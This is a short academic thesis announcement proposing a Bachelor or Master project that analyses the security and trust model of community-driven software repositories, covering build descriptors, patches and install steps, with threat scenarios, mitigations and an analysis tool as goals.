Community-driven software repositories provide users with current software that is maintained by volunteers.
Most provide the following workflow:
- Acquire the tarball containing build descriptor and patches
- Download source or third party components
- Apply patches and build
- Download/display readme
- Install the resulting files
This process requires the users of the repository to trust a) the build descriptor b) downloaded files c) patches d) executed compilation commands e) install procedure. As this workflow and the associated security model have several potential flaws, a tool supported analysis of the largest community-driven software repositories provides a valuable contribution to the open source community.
- Investigation of distribution methods of community-driven software repositories
- Investigation of threat-scenarios
- Investigation of mitigation techniques
- Implementation of analysis / mitigation tool
- Automated analysis of repository
This project can either be tackled as a Bachelor Thesis (up to 2 students) or as a Master Thesis (1 student) – The implementation/research focus depends on team size and personal interest of the student(s).
Contact: firstname.lastname@example.org http://csillaber.q-e.at